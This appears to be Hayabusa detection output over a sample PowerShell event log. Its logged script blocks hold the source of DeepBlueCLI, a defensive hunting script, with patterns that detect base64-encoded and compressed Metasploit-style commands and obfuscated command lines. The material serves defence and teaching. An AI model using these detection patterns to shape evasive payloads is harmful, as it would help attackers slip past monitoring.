Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:49:18.992 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:49:18.994 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" 
{$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:49:32.379 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:49:32.379 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:49:32.379 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. 
# $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:49:32.380 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. 
Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:49:33.354 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:11:09.934 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:11:24.665 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:11:27.663 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.3.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:11:27.669 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. 
.Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Obfu $pscommand) $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Obfu $commandline) $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if 
($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:11:27.669 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. 
.Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Obfu $pscommand) $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Obfu $commandline) $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if 
($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:11:27.669 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"$maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } 
Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. 
Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if 